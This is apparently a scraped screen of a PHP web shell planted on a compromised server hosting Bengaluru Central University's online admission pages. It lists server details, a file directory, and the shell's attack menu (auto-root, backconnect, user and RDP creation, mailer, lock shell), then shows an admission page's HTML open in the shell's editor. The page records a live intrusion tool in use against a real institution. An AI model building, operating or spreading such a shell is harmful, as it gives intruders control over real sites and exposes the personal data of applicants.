Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.133.145.168
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
pget /
dud /
[ HOME SHELL ]
Name
Size
Permission
Action
Counselling Dates and Instruct...
239.65
KB
-rw-rw-r--
MainPage.html
52.32
KB
-rwxr-xr-x
Provisional Consolidated Merit...
2.22
MB
-rw-rw-r--
add-course-payment.html
692
B
-rw-rw-r--
add-course.html
1.23
KB
-rw-rw-r--
admfee.html
2.48
KB
-rw-rw-r--
app-status.html
3.35
KB
-rwxr-xr-x
contact_no.jpeg
569.28
KB
-rwxr-xr-x
controler_sign.jpg
26.41
KB
-rwxr-xr-x
dat.json
5.03
KB
-rwxr-xr-x
elig_adm.jpeg
423.87
KB
-rwxr-xr-x
ent-application.html
88.03
KB
-rwxr-xr-x
ent-application05.10.2020.html
83.65
KB
-rwxr-xr-x
forgotPassword.html
5.11
KB
-rwxr-xr-x
genRankPrio.php
894
B
-rwxr-xr-x
important_dates.jpeg
575.06
KB
-rwxr-xr-x
index.php
6.85
KB
-rw-rw-r--
index_adm.html
5.42
KB
-rwxr-xr-x
instruction.html
10.69
KB
-rwxr-xr-x
login.html
6.94
KB
-rwxr-xr-x
make-payment.html
452
B
-rwxr-xr-x
mock-seat-allotment.html
608
B
-rwxr-xr-x
option-entry.html
1.54
KB
-rwxr-xr-x
pg-forgotPassword.html
4.1
KB
-rwxr-xr-x
pg-sign-up.html
7.81
KB
-rwxr-xr-x
pg_adm_tt.jpeg
266.03
KB
-rwxr-xr-x
pg_instruction.html
9.42
KB
-rwxr-xr-x
pgadm.html
67.76
KB
-rwxr-xr-x
seat-allotment.html
1.08
KB
-rwxr-xr-x
seatAllot.php
6.75
KB
-rwxr-xr-x
sign-up.html
7.95
KB
-rwxr-xr-x
support.html
4.76
KB
-rwxr-xr-x
upload_file.php
787
B
-rwxr-xr-x
upload_file_pg.php
746
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : support.html
<!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=Edge"> <meta content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" name="viewport"> <title>BCU: Bengaluru Central University</title> <!-- Favicon--> <link rel="icon" href="images/favicon.jpg" type="image/x-icon"> <!-- Google Fonts --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:400,600,700,800&subset=latin-ext" rel="stylesheet"> <link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet" type="text/css"> <!-- Bootstrap Core Css --> <link href="plugins/bootstrap/css/bootstrap_adm.css" rel="stylesheet"> <!-- Waves Effect Css --> <link href="plugins/node-waves/waves.css" rel="stylesheet" /> <!-- Custom Css --> <link href="css/style_adm.css" rel="stylesheet"> <!-- AdminBSB Themes. You can choose a theme from css/themes instead of get all themes --> <link href="css/themes/all-themes.css" rel="stylesheet" /> </head> <body class="theme-pink" onload="login()"> <!-- Page Loader --> <div class="page-loader-wrapper"> <div class="loader"> <div class="preloader"> <div class="spinner-layer pl-red"> <div class="circle-clipper left"> <div class="circle"></div> </div> <div class="circle-clipper right"> <div class="circle"></div> </div> </div> </div> <p>Please wait...</p> </div> </div> <!-- #END# Page Loader --> <!-- Top Bar --> <nav class="navbar"> <div class="container-fluid" style="color: #fff;"> <div class='col-md-12 m-t--5'> <a class="links" href="#" onclick="homeLink()" style="float: right;margin-top: 15px; font-size:16px;color: #fff; margin-left: 10px;">Logout</a> <a class="links" href="instruction.html" style="float: right; padding-top: 15px;font-size:16px;color: #fff;">Home</a> <center> <h2 class="brand" style="margin-left: 100px;">Bengaluru Central University</h2> </center> <center> <h3 class="brand" class="m-t--5">Online Admission Entry</h3> </center> </div> </div> </nav> <section class="content"> <div class="row clearfix"> <div class="container-fluid"> <div class="col-lg-10 col-md-10 col-sm-12 col-xs-12"> <div class="card"> <div class="header bg-blue"> <h2>Instructions</h2> </div> <div class="body" style="font-size: 15px;"> <div style="display: flex;flex-direction: row;justify-content: space-around;margin-bottom: 2%;"> <div id="admEnt"> <a href='assets/instr_students.pdf' target="blank"><button type="button" class="btn btn-lg btn-success waves-effect">Instructions</button></a> </div> <div> <a href='#'><button type="button" class="btn btn-lg btn-success waves-effect">Sample Filled Form</button></a> </div> </div> <video controls style="width: 100%; height: 50vh;"> <source src="assets/uniclare_comp.mp4" type="video/mp4"> <source src="assets/uniclare_comp.ogg" type="video/ogg"> Your browser does not support the video tag. </video> </div> </div> </div> </div> </div> </section> <script src="plugins/jquery/jquery.min.js"></script> <!-- Bootstrap Core Js --> <script src="plugins/bootstrap/js/bootstrap.js"></script> <!-- Select Plugin Js --> <script src="plugins/bootstrap-select/js/bootstrap-select.js"></script> <!-- Slimscroll Plugin Js --> <script src="plugins/jquery-slimscroll/jquery.slimscroll.js"></script> <!-- Waves Effect Plugin Js --> <script src="plugins/node-waves/waves.js"></script> <script src="js/kusPhdAdm.js?v=22" type="text/javascript"></script> <!-- Custom Js --> <script src="js/admin.js"></script> <script src="js/login.js"></script> <!-- Demo Js --> <script src="js/demo.js"></script> <script type="text/javascript"> $(function () { $(window).bind("beforeunload", function () { fnLogOut(); }) }); function fnLogOut() { alert('browser closing'); } </script> </body> </html>
Close